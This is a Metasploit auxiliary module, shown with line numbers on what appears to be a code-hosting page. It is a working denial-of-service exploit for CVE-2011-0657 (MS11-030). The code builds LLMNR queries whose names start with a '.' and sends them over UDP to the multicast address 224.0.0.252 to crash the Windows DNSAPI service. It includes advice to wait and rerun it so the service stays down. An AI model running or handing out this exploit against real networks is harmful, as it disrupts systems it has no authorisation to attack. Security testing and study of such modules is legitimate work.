Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize
11
    super(
12
      'Name'        => 'Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS',
13
      'Description' => %q{
14
          This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll
15
        as distributed with Windows Vista and later without KB2509553. By sending a
16
        specially crafted LLMNR query, containing a leading '.' character, an attacker
17
        can trigger stack exhaustion or potentially cause stack memory corruption.
18

19
        Although this vulnerability may lead to code execution, it has not been proven
20
        to be possible at the time of this writing.
21

22
        NOTE: In some circumstances, a '.' may be found before the top of the stack is
23
        reached. In these cases, this module may not be able to cause a crash.
24
      },
25
      'Author'      => 'jduck',
26
      'License'     => MSF_LICENSE,
27
      'References'  =>
28
        [
29
          [ 'CVE', '2011-0657' ],
30
          [ 'OSVDB', '71780' ],
31
          [ 'MSB', 'MS11-030' ]
32
        ],
33
      'DisclosureDate' => 'Apr 12 2011')
34

35
    register_options(
36
      [
37
        Opt::RPORT(5355),
38
        Opt::RHOST('224.0.0.252')
39
      ])
40
  end
41

42
  def make_query(str)
43
    pkt = ""
44

45
    # id
46
    pkt << [rand(65535)].pack('n')
47

48
    # flags
49
    pkt << [(
50
      '0' +     # qr
51
      '0000' +  # opcode
52
      '0' +     # conflict
53
      '0' +     # truncation
54
      '0' +     # tentative
55
      '0000' +  # zero (reserved)
56
      '0000'    # rcode
57
      )].pack('B16')
58

59
    # counts
60
    pkt << [1,0,0,0].pack('n*')
61

62
    if str[0,1] == "."
63
      pkt << [str.length].pack('C')
64
    end
65
    pkt << str + "\x00"
66

67
    # type / class (PTR/IN)
68
    pkt << [0x0c, 0x01].pack('n*')
69

70
    pkt
71
  end
72

73

74
  def run
75
    connect_udp
76

77
    # query
78

79
    # various compressed queries
80
    #pkt << "\x03" + ("%d" % 192)
81
    #pkt << "\x03" + "144" + "\x01" + "0" + "\x03" + "168" + "\x03" + "192"
82
    #pkt << ("\x01" + '1') * 0x20
83
    #pkt << "\x01" + '.'
84
    #pkt << ("\x01\x2e") + "\x01" + "0"
85
    #pkt << "\x07" + 'in-addr' + "\x04" + 'arpa' + "\x00"
86
    #pkt << "\x03" + 'ip6' + "\x04" + 'arpa' + "\x00"
87
    #pkt << ".e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f".gsub('.', "\x01") + "\x03ip6\x04arpa\x00"
88

89
    pkt = make_query(".1.1.ip6.arpa")
90
    print_status("Sending Ipv6 LLMNR query to #{rhost}")
91
    udp_sock.put(pkt)
92

93
    pkt = make_query(".1.1.in-addr.arpa")
94
    print_status("Sending Ipv4 LLMNR query to #{rhost}")
95
    udp_sock.put(pkt)
96

97
    print_status("Note, in a default configuration, the service will restart automatically twice.")
98
    print_status("In order to ensure it is completely dead, wait up to 5 minutes and run it again.")
99

100
    disconnect_udp
101
  end
102
end
103

104